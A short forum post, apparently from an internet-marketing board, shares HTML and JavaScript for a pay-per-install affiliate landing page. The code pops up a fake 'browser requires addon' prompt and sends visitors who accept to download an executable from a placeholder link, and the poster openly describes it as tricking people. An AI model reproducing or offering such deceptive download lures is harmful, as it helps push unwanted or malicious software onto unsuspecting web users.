jake3340
Supreme Member
- Nov 20, 2008
- 1,439
- 437
For those wanting to make a landing page promoting PPI affiliates, Here is a little code i made that will make a JavaScript pop up tricking the person he needs to download the PPI install exe file to view your webpage.
<a href="javascript: if (confirm('Browser requires addon to view this website, click continue to download addon.')) { window.location.href='www.yourlinktodownload.com/something.exe' } else { void('') };">Text to be viewed on Webpage</a> </p>
<div align="center">